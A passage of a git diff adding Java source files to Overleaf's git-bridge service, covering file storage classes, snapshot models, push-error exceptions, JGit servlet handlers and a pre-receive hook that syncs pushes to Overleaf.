b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RawDirectory.java new file mode 100644 index 0000000..ccaf3f8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RawDirectory.java @@ -0,0 +1,19 @@ +package uk.ac.ic.wlgitbridge.data.filestore; + +import java.util.Map; + +/* + * Created by Winston on 16/11/14. + */ +public class RawDirectory { + + private final Map<String, RawFile> fileTable; + + public RawDirectory(Map<String, RawFile> fileTable) { + this.fileTable = fileTable; + } + + public Map<String, RawFile> getFileTable() { + return fileTable; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RawFile.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RawFile.java new file mode 100644 index 0000000..a0056ec --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RawFile.java @@ -0,0 +1,43 @@ +package uk.ac.ic.wlgitbridge.data.filestore; + +import java.io.File; +import java.io.FileOutputStream; +import java.io.IOException; +import java.io.OutputStream; +import java.util.Arrays; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 16/11/14. + */ +public abstract class RawFile { + + public abstract String getPath(); + + public abstract byte[] getContents(); + + public abstract long size(); + + public final void writeToDisk(File directory) throws IOException { + writeToDiskWithName(directory, getPath()); + } + + public final void writeToDiskWithName(File directory, String name) throws IOException { + File file = new File(directory, name); + file.getParentFile().mkdirs(); + file.createNewFile(); + OutputStream out = new FileOutputStream(file); + out.write(getContents()); + out.close(); + Log.debug("Wrote file: {}", file.getAbsolutePath()); + } + + @Override + public boolean equals(Object obj) { + if (!(obj instanceof RawFile)) { + return false; + } + RawFile that = (RawFile) obj; + return getPath().equals(that.getPath()) && Arrays.equals(getContents(), that.getContents()); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RepositoryFile.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RepositoryFile.java new file mode 100644 index 0000000..5bb6ab3 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RepositoryFile.java @@ -0,0 +1,30 @@ +package uk.ac.ic.wlgitbridge.data.filestore; + +/* + * Created by Winston on 16/11/14. + */ +public class RepositoryFile extends RawFile { + + private final String path; + private final byte[] contents; + + public RepositoryFile(String path, byte[] contents) { + this.path = path; + this.contents = contents; + } + + @Override + public String getPath() { + return path; + } + + @Override + public byte[] getContents() { + return contents; + } + + @Override + public long size() { + return contents.length; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/model/Snapshot.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/model/Snapshot.java new file mode 100644 index 0000000..bfd2e80 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/model/Snapshot.java @@ -0,0 +1,75 @@ +package uk.ac.ic.wlgitbridge.data.model; + +import java.util.Date; +import java.util.List; +import org.joda.time.DateTime; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotAttachment; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotData; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotFile; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.SnapshotInfo; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.WLUser; + +/* + * Created by Winston on 03/11/14. + */ +public class Snapshot implements Comparable<Snapshot> { + + private final int versionID; + private final String comment; + private final String userName; + private final String userEmail; + private final Date createdAt; + + private final List<SnapshotFile> srcs; + private final List<SnapshotAttachment> atts; + + public Snapshot(SnapshotInfo info, SnapshotData data) { + versionID = info.getVersionId(); + comment = info.getComment(); + WLUser user = info.getUser(); + userName = user.getName(); + userEmail = user.getEmail(); + createdAt = new DateTime(info.getCreatedAt()).toDate(); + + srcs = data.getSrcs(); + atts = data.getAtts(); + } + + public int getVersionID() { + return versionID; + } + + public String getComment() { + return comment; + } + + public String getUserName() { + return userName; + } + + public String getUserEmail() { + return userEmail; + } + + public List<SnapshotFile> getSrcs() { + return srcs; + } + + public List<SnapshotAttachment> getAtts() { + return atts; + } + + public Date getCreatedAt() { + return createdAt; + } + + @Override + public int compareTo(Snapshot snapshot) { + return Integer.compare(versionID, snapshot.versionID); + } + + @Override + public String toString() { + return String.valueOf(versionID); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/FileLimitExceededException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/FileLimitExceededException.java new file mode 100644 index 0000000..0a4b39c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/FileLimitExceededException.java @@ -0,0 +1,31 @@ +package uk.ac.ic.wlgitbridge.git.exception; + +import java.util.Arrays; +import java.util.List; + +public class FileLimitExceededException extends GitUserException { + + private final long numFiles; + + private final long maxFiles; + + public FileLimitExceededException(long numFiles, long maxFiles) { + this.numFiles = numFiles; + this.maxFiles = maxFiles; + } + + @Override + public String getMessage() { + return "too many files"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList( + "repository contains " + + numFiles + + " files, which exceeds the limit of " + + maxFiles + + " files"); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/GitUserException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/GitUserException.java new file mode 100644 index 0000000..ed8716e --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/GitUserException.java @@ -0,0 +1,13 @@ +package uk.ac.ic.wlgitbridge.git.exception; + +import java.util.List; + +/* + * Created by winston on 20/08/2016. + */ +public abstract class GitUserException extends Exception { + + public abstract String getMessage(); + + public abstract List<String> getDescriptionLines(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/InvalidGitRepository.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/InvalidGitRepository.java new file mode 100644 index 0000000..404189d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/InvalidGitRepository.java @@ -0,0 +1,20 @@ +package uk.ac.ic.wlgitbridge.git.exception; + +import java.util.Arrays; +import java.util.List; + +public class InvalidGitRepository extends GitUserException { + + @Override + public String getMessage() { + return "invalid git repo"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList( + "Your Git repository contains a reference we cannot resolve.", + "If your project contains a Git submodule,", + "please remove it and try again."); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/SizeLimitExceededException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/SizeLimitExceededException.java new file mode 100644 index 0000000..c6d0787 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/SizeLimitExceededException.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.git.exception; + +import java.util.Arrays; +import java.util.List; +import java.util.Optional; +import uk.ac.ic.wlgitbridge.util.Util; + +public class SizeLimitExceededException extends GitUserException { + + private final Optional<String> path; + + private final long actualSize; + + private final long maxSize; + + public SizeLimitExceededException(Optional<String> path, long actualSize, long maxSize) { + this.path = path; + this.actualSize = actualSize; + this.maxSize = maxSize; + } + + @Override + public String getMessage() { + return "file too big"; + } + + @Override + public List<String> getDescriptionLines() { + String filename = path.isPresent() ? "File '" + path.get() + "' is" : "There's a file"; + return Arrays.asList( + filename + " too large to push to " + Util.getServiceName() + " via git", + "the recommended maximum file size is 50 MiB"); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/SnapshotAPIException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/SnapshotAPIException.java new file mode 100644 index 0000000..733e156 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/SnapshotAPIException.java @@ -0,0 +1,8 @@ +package uk.ac.ic.wlgitbridge.git.exception; + +import uk.ac.ic.wlgitbridge.snapshot.base.JSONSource; + +/* + * Created by winston on 20/08/2016. + */ +public abstract class SnapshotAPIException extends GitUserException implements JSONSource {} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLReceivePackFactory.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLReceivePackFactory.java new file mode 100644 index 0000000..b8392cf --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLReceivePackFactory.java @@ -0,0 +1,68 @@ +package uk.ac.ic.wlgitbridge.git.handler; + +import com.google.api.client.auth.oauth2.Credential; +import java.util.Optional; +import javax.servlet.http.HttpServletRequest; +import org.eclipse.jgit.lib.Repository; +import org.eclipse.jgit.transport.ReceivePack; +import org.eclipse.jgit.transport.resolver.ReceivePackFactory; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.git.handler.hook.WriteLatexPutHook; +import uk.ac.ic.wlgitbridge.server.Oauth2Filter; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 02/11/14. + */ +/* + * One of the "big three" interfaces created by {@link WLGitServlet} to handle + * user Git requests. + * + * This class just puts a {@link WriteLatexPutHook} into the {@link ReceivePack} + * that it returns. + */ +public class WLReceivePackFactory implements ReceivePackFactory<HttpServletRequest> { + + private final RepoStore repoStore; + + private final Bridge bridge; + + public WLReceivePackFactory(RepoStore repoStore, Bridge bridge) { + this.repoStore = repoStore; + this.bridge = bridge; + } + + /* + * Puts a {@link WriteLatexPutHook} into the returned {@link ReceivePack}. + * + * The {@link WriteLatexPutHook} needs our hostname, which we get from the + * original {@link HttpServletRequest}, used to provide a postback URL to + * the {@link SnapshotApi}. We also give it the oauth2 that we injected in + * the {@link Oauth2Filter}, and the {@link Bridge}. + * + * At this point, the repository will have been synced to the latest on + * Overleaf, but it's possible that an update happens on Overleaf while our + * put hook is running. In this case, we fail, and the user tries again, + * triggering another sync, and so on. + * @param httpServletRequest the original request + * @param repository the JGit {@link Repository} provided by + * {@link WLRepositoryResolver} + * @return a correctly hooked {@link ReceivePack} + */ + @Override + public ReceivePack create(HttpServletRequest httpServletRequest, Repository repository) { + Log.debug("[{}] Creating receive-pack", repository.getWorkTree().getName()); + Optional<Credential> oauth2 = + Optional.ofNullable( + (Credential) httpServletRequest.getAttribute(Oauth2Filter.ATTRIBUTE_KEY)); + ReceivePack receivePack = new ReceivePack(repository); + String hostname = Util.getPostbackURL(); + if (hostname == null) { + hostname = httpServletRequest.getLocalName(); + } + receivePack.setPreReceiveHook(new WriteLatexPutHook(repoStore, bridge, hostname, oauth2)); + return receivePack; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLRepositoryResolver.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLRepositoryResolver.java new file mode 100644 index 0000000..d9ddbda --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLRepositoryResolver.java @@ -0,0 +1,112 @@ +package uk.ac.ic.wlgitbridge.git.handler; + +import com.google.api.client.auth.oauth2.Credential; +import java.io.IOException; +import java.util.Optional; +import javax.servlet.http.HttpServletRequest; +import org.eclipse.jgit.errors.RepositoryNotFoundException; +import org.eclipse.jgit.lib.Repository; +import org.eclipse.jgit.transport.ServiceMayNotContinueException; +import org.eclipse.jgit.transport.resolver.RepositoryResolver; +import org.eclipse.jgit.transport.resolver.ServiceNotAuthorizedException; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.server.Oauth2Filter; +import uk.ac.ic.wlgitbridge.snapshot.base.ForbiddenException; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 02/11/14. + */ +/* + * One of the "big three" interfaces created by {@link WLGitServlet} to handle + * user Git requests. + * + * This class is used by all Git requests to resolve a project name to a + * JGit {@link Repository}, or fail by throwing an exception. + * + * It has a single method, {@link #open(HttpServletRequest, String)}, which + * calls into the {@link Bridge} to synchronise the project with Overleaf, i.e. + * bringing it onto disk and applying commits to it until it is up-to-date with + * Overleaf. + */ +public class WLRepositoryResolver implements RepositoryResolver<HttpServletRequest> { + + private final Bridge bridge; + + public WLRepositoryResolver(Bridge bridge) { + this.bridge = bridge; + } + + /* + * Calls into the Bridge to resolve a project name to a JGit + * {@link Repository}, or throw an exception. + * + * On success, the repository will have been brought onto disk and updated + * to the latest (synced). + * + * In the case of clones and fetches, upload packs are created from the + * returned JGit {@link Repository} by the {@link WLUploadPackFactory}. + * + * The project lock is acquired for this process so it can't be swapped out. + * + * However, it can still be swapped out between this and a Git push. The + * push would fail due to the project changed on Overleaf between the sync + * and the actual push to Overleaf (performed by the + * {@link WLReceivePackFactory} and {@link WriteLatexPutHook}. In this case, + * the user will have to try again (which prompts another update, etc. until + * this no longer happens). + * @param httpServletRequest The HttpServletRequest as required by the + * interface. We injected the oauth2 creds into it with + * {@link Oauth2Filter}, which was set up by the {@link GitBridgeServer}. + * @param name The name of the project + * @return the JGit {@link Repository}. + * @throws RepositoryNotFoundException If the project does not exist + * @throws ServiceNotAuthorizedException If the user did not auth when + * required to + * @throws ServiceMayNotContinueException If any other general user + * exception occurs that must be propogated back to the user, e.g. + * internal errors (IOException, etc), too large file, and so on. + */ + @Override + public Repository open(HttpServletRequest httpServletRequest, String name) + throws RepositoryNotFoundException, + ServiceNotAuthorizedException, + ServiceMayNotContinueException { + Log.debug("[{}] Request to open git repo", name); + Optional<Credential> oauth2 = + Optional.ofNullable( + (Credential) httpServletRequest.getAttribute(Oauth2Filter.ATTRIBUTE_KEY)); + String projName = Util.removeAllSuffixes(name, "/", ".git"); + try { + return bridge.getUpdatedRepo(oauth2, projName).getJGitRepository(); + } catch (RepositoryNotFoundException e) { + Log.warn("Repository not found: " + name); + throw e; + /* + } catch (ServiceNotAuthorizedException e) { + cannot occur + } catch (ServiceNotEnabledException e) { + cannot occur + */ + } catch (ServiceMayNotContinueException e) { + /* Such as FailedConnectionException */ + throw e; + } catch (CannotAcquireLockException e) { + throw new ServiceMayNotContinueException(e.getMessage()); + } catch (RuntimeException e) { + Log.warn("Runtime exception when trying to open repo: " + projName, e); + throw new ServiceMayNotContinueException(e); + } catch (ForbiddenException e) { + throw new ServiceNotAuthorizedException(); + } catch (GitUserException e) { + throw new ServiceMayNotContinueException( + e.getMessage() + "\n" + String.join("\n", e.getDescriptionLines()), e); + } catch (IOException e) { + Log.warn("IOException when trying to open repo: " + projName, e); + throw new ServiceMayNotContinueException("Internal server error."); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLUploadPackFactory.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLUploadPackFactory.java new file mode 100644 index 0000000..646d08c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLUploadPackFactory.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.git.handler; + +import javax.servlet.http.HttpServletRequest; +import org.eclipse.jgit.lib.Repository; +import org.eclipse.jgit.transport.UploadPack; +import org.eclipse.jgit.transport.resolver.UploadPackFactory; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 02/11/14. + */ +/* + * One of the "big three" interfaces created by {@link WLGitServlet} to handle + * user Git requests. + * + * The actual class doesn't do much, and most of the work is done when the + * project name is being resolved by the {@link WLRepositoryResolver}. + */ +public class WLUploadPackFactory implements UploadPackFactory<HttpServletRequest> { + + /* + * This does nothing special. Synchronising the project with Overleaf will + * have been performed by {@link WLRepositoryResolver}. + * @param __ Not used, required by the {@link UploadPackFactory} interface + * @param repository The JGit repository provided by the + * {@link WLRepositoryResolver} + * @return the {@link UploadPack}, used by JGit to serve the request + */ + @Override + public UploadPack create(HttpServletRequest __, Repository repository) { + Log.debug("[{}] Creating upload-pack", repository.getWorkTree().getName()); + return new UploadPack(repository); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/WriteLatexPutHook.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/WriteLatexPutHook.java new file mode 100644 index 0000000..24979f8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/WriteLatexPutHook.java @@ -0,0 +1,143 @@ +package uk.ac.ic.wlgitbridge.git.handler.hook; + +import com.google.api.client.auth.oauth2.Credential; +import java.io.IOException; +import java.util.Collection; +import java.util.Iterator; +import java.util.Optional; +import org.eclipse.jgit.lib.Repository; +import org.eclipse.jgit.transport.PreReceiveHook; +import org.eclipse.jgit.transport.ReceiveCommand; +import org.eclipse.jgit.transport.ReceiveCommand.Result; +import org.eclipse.jgit.transport.ReceivePack; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.git.handler.hook.exception.ForcedPushException; +import uk.ac.ic.wlgitbridge.git.handler.hook.exception.WrongBranchException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InternalErrorException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.OutOfDateException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 03/11/14. + */ +/* + * Created by {@link WLReceivePackFactory} to update the {@link Bridge} for a + * user's Git push request, or fail with an error. The hook is able to approve + * or reject a request. + */ +public class WriteLatexPutHook implements PreReceiveHook { + + private final RepoStore repoStore; + + private final Bridge bridge; + private final String hostname; + private final Optional<Credential> oauth2; + + /* + * The constructor to use, which provides the hook with the {@link Bridge}, + * the hostname (used to construct a URL to give to Overleaf to postback), + * and the oauth2 (used to authenticate with the Snapshot API). + * @param repoStore + * @param bridge the {@link Bridge} + * @param hostname the hostname used for postback from the Snapshot API + * @param oauth2 used to authenticate with the snapshot API, or null + */ + public WriteLatexPutHook( + RepoStore repoStore, Bridge bridge, String hostname, Optional<Credential> oauth2) { + this.repoStore = repoStore; + this.bridge = bridge; + this.hostname = hostname; + this.oauth2 = oauth2; + } + + @Override + public void onPreReceive(ReceivePack receivePack, Collection<ReceiveCommand> receiveCommands) { + Log.debug( + "-> Handling {} commands in {}", + receiveCommands.size(), + receivePack.getRepository().getDirectory().getAbsolutePath()); + for (ReceiveCommand receiveCommand : receiveCommands) { + try { + handleReceiveCommand(oauth2, receivePack.getRepository(), receiveCommand); + } catch (IOException e) { + Log.error("IOException on pre receive", e); + receivePack.sendError(e.getMessage()); + receiveCommand.setResult(Result.REJECTED_OTHER_REASON, e.getMessage()); + } catch (OutOfDateException e) { + Log.error("OutOfDateException on pre receive", e); + receiveCommand.setResult(Result.REJECTED_NONFASTFORWARD); + } catch (GitUserException e) { + Log.error("GitUserException on pre receive", e); + handleSnapshotPostException(receivePack, receiveCommand, e); + } catch (CannotAcquireLockException e) { + Log.info("CannotAcquireLockException on pre receive"); + receivePack.sendError(e.getMessage()); + receiveCommand.setResult(Result.REJECTED_OTHER_REASON, e.getMessage()); + } catch (Throwable t) { + Log.error("Throwable on pre receive", t); + handleSnapshotPostException(receivePack, receiveCommand, new InternalErrorException()); + } + } + Log.debug( + "-> Handled {} commands in {}", + receiveCommands.size(), + receivePack.getRepository().getDirectory().getAbsolutePath()); + } + + private void handleSnapshotPostException( + ReceivePack receivePack, ReceiveCommand receiveCommand, GitUserException e) { + String message = e.getMessage(); + receivePack.sendError(message); + StringBuilder msg = new StringBuilder(); + for (Iterator<String> it = e.getDescriptionLines().iterator(); it.hasNext(); ) { + String line = it.next(); + msg.append("hint: "); + msg.append(line); + if (it.hasNext()) { + msg.append('\n'); + } + } + receivePack.sendMessage(""); + receivePack.sendMessage(msg.toString()); + receiveCommand.setResult(Result.REJECTED_OTHER_REASON, message); + } + + private void handleReceiveCommand( + Optional<Credential> oauth2, Repository repository, ReceiveCommand receiveCommand) + throws IOException, GitUserException, CannotAcquireLockException { + checkBranch(receiveCommand); + checkForcedPush(receiveCommand); + bridge.push( + oauth2, + repository.getWorkTree().getName(), + getPushedDirectoryContents(repository, receiveCommand), + getOldDirectoryContents(repository), + hostname); + } + + private void checkBranch(ReceiveCommand receiveCommand) throws WrongBranchException { + if (!receiveCommand.getRefName().equals("refs/heads/master")) { + throw new WrongBranchException(); + } + } + + private void checkForcedPush(ReceiveCommand receiveCommand) throws ForcedPushException { + if (receiveCommand.getType() == ReceiveCommand.Type.UPDATE_NONFASTFORWARD) { + throw new ForcedPushException(); + } + } + + private RawDirectory getPushedDirectoryContents( + Repository repository, ReceiveCommand receiveCommand) throws IOException, GitUserException { + return repoStore.useJGitRepo(repository, receiveCommand.getNewId()).getDirectory(); + } + + private RawDirectory getOldDirectoryContents(Repository repository) + throws IOException, GitUserException { + return repoStore.useJGitRepo(repository, repository.resolve("HEAD")).getDirectory(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/exception/ForcedPushException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/exception/ForcedPushException.java new file mode 100644 index 0000000..d1d3509 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/exception/ForcedPushException.java @@ -0,0 +1,33 @@ +package uk.ac.ic.wlgitbridge.git.handler.hook.exception; + +import com.google.gson.JsonElement; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostException; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 16/11/14. + */ +public class ForcedPushException extends SnapshotPostException { + + private static final String[] DESCRIPTION_LINES = { + "You can't git push --force to a " + Util.getServiceName() + " project.", + "Try to put your changes on top of the current head.", + "If everything else fails, delete and reclone your repository, " + + "make your changes, then push again." + }; + + @Override + public String getMessage() { + return "forced push prohibited"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList(DESCRIPTION_LINES); + } + + @Override + public void fromJSON(JsonElement json) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/exception/WrongBranchException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/exception/WrongBranchException.java new file mode 100644 index 0000000..e216781 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/exception/WrongBranchException.java @@ -0,0 +1,29 @@ +package uk.ac.ic.wlgitbridge.git.handler.hook.exception; + +import com.google.gson.JsonElement; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostException; + +/* + * Created by Winston on 19/12/14. + */ +public class WrongBranchException extends SnapshotPostException { + + private static final String[] DESCRIPTION_LINES = { + "You can't push any new branches.", "Please use the master branch." + }; + + @Override + public String getMessage() { + return "wrong branch"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList(DESCRIPTION_LINES); + } + + @Override + public void fromJSON(JsonElement json) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/servlet/WLGitServlet.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/servlet/WLGitServlet.java new file mode 100644 index 0000000..b29ad78 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/servlet/WLGitServlet.java @@ -0,0 +1,46 @@ +package uk.ac.ic.wlgitbridge.git.servlet; + +import javax.servlet.ServletException; +import org.eclipse.jetty.servlet.ServletContextHandler; +import org.eclipse.jgit.http.server.GitServlet; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.git.handler.WLReceivePackFactory; +import uk.ac.ic.wlgitbridge.git.handler.WLRepositoryResolver; +import uk.ac.ic.wlgitbridge.git.handler.WLUploadPackFactory; + +/* + * Created by Winston on 02/11/14. + */ +/* + * This is the Servlet created by the {@link GitBridgeServer} that does all of + * the work in handling user Git requests and directing them to the + * {@link Bridge}. + * + * The {@link GitServlet} does all of the Git work, and these main three + * interfaces do all of the Git Bridge work: + * + * @see WLRepositoryResolver + * @see WLReceivePackFactory + * @see WLUploadPackFactory + */ +public class WLGitServlet extends GitServlet { + + /* + * Constructor that sets all of the resolvers and factories for the + * {@link GitServlet}. + * + * Also needs to call init with a config ({@link WLGitServletConfig}, as + * required by the {@link GitServlet}. + * @param ctxHandler + * @param bridge + * @throws ServletException + */ + public WLGitServlet(ServletContextHandler ctxHandler, RepoStore repoStore, Bridge bridge) + throws ServletException { + setRepositoryResolver(new WLRepositoryResolver(bridge)); + setReceivePackFactory(new WLReceivePackFactory(repoStore, bridge)); + setUploadPackFactory(new WLUploadPackFactory()); + init(new WLGitServletConfig(ctxHandler)); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/servlet/WLGitServletConfig.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/servlet/WLGitServletConfig.java new file mode 100644 index 0000000..022382a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/servlet/WLGitServletConfig.java @@ -0,0 +1,40 @@ +package uk.ac.ic.wlgitbridge.git.servlet; + +import java.util.Enumeration; +import javax.servlet.ServletConfig; +import javax.servlet.ServletContext; +import org.eclipse.jetty.servlet.ServletContextHandler; + +/* + * Created by Winston on 02/11/14. + */ +public class WLGitServletConfig implements ServletConfig { + + private static final String SERVLET_NAME = "git-servlet"; + + private ServletContext servletContext; + + public WLGitServletConfig(ServletContextHandler ctxHandler) { + servletContext = ctxHandler.getServletContext(); + } + + @Override + public String getServletName() { + return SERVLET_NAME; + } + + @Override + public ServletContext getServletContext() { + return servletContext; + } + + @Override + public String getInitParameter(String s) { + return null; + } + + @Override + public Enumeration<String> getInitParameterNames() { + return null; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/util/RepositoryObjectTreeWalker.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/util/RepositoryObjectTreeWalker.java new file mode 100644 index 0000000..bdd9661 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/util/RepositoryObjectTreeWalker.java @@ -0,0 +1,83 @@ +package uk.ac.ic.wlgitbridge.git.util; + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.util.HashMap; +import java.util.Map; +import java.util.Optional; +import org.eclipse.jgit.lib.ObjectId; +import org.eclipse.jgit.lib.ObjectLoader; +import org.eclipse.jgit.lib.Repository; +import org.eclipse.jgit.revwalk.RevWalk; +import org.eclipse.jgit.treewalk.TreeWalk; +import uk.ac.ic.wlgitbridge.bridge.util.CastUtil; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.data.filestore.RepositoryFile; +import uk.ac.ic.wlgitbridge.git.exception.InvalidGitRepository; +import uk.ac.ic.wlgitbridge.git.exception.SizeLimitExceededException; + +/* + * Created by Winston on 16/11/14. + */ +public class RepositoryObjectTreeWalker { + + private final TreeWalk treeWalk; + private final Repository repository; + + public RepositoryObjectTreeWalker(Repository repository, ObjectId objectId) throws IOException { + treeWalk = initTreeWalk(repository, objectId); + this.repository = repository; + } + + public RepositoryObjectTreeWalker(Repository repository) throws IOException { + this(repository, 0); + } + + public RepositoryObjectTreeWalker(Repository repository, int fromHead) throws IOException { + this(repository, repository.resolve("HEAD~" + fromHead)); + } + + public RawDirectory getDirectoryContents(Optional<Long> maxFileSize) + throws IOException, SizeLimitExceededException, InvalidGitRepository { + return new RawDirectory(walkGitObjectTree(maxFileSize)); + } + + private TreeWalk initTreeWalk(Repository repository, ObjectId objectId) throws IOException { + if (objectId == null) { + return null; + } + RevWalk walk = new RevWalk(repository); + TreeWalk treeWalk = new TreeWalk(repository); + treeWalk.addTree(walk.parseCommit(objectId).getTree()); + treeWalk.setRecursive(true); + return treeWalk; + } + + private Map<String, RawFile> walkGitObjectTree(Optional<Long> maxFileSize) + throws IOException, SizeLimitExceededException, InvalidGitRepository { + Map<String, RawFile> fileContentsTable = new HashMap<>(); + if (treeWalk == null) { + return fileContentsTable; + } + while (treeWalk.next()) { + String path = treeWalk.getPathString(); + + ObjectId objectId = treeWalk.getObjectId(0); + if (!repository.hasObject(objectId)) { + throw new InvalidGitRepository(); + } + ObjectLoader obj = repository.open(objectId); + long size = obj.getSize(); + if (maxFileSize.isPresent() && size > maxFileSize.get()) { + throw new SizeLimitExceededException(Optional.ofNullable(path), size, maxFileSize.get()); + } + try (ByteArrayOutputStream o = new ByteArrayOutputStream(CastUtil.assumeInt(size))) { + obj.copyTo(o); + fileContentsTable.put(path, new RepositoryFile(path, o.toByteArray())); + } + ; + } + return fileContentsTable; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/io/http/ning/NingHttpClient.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/io/http/ning/NingHttpClient.java new file 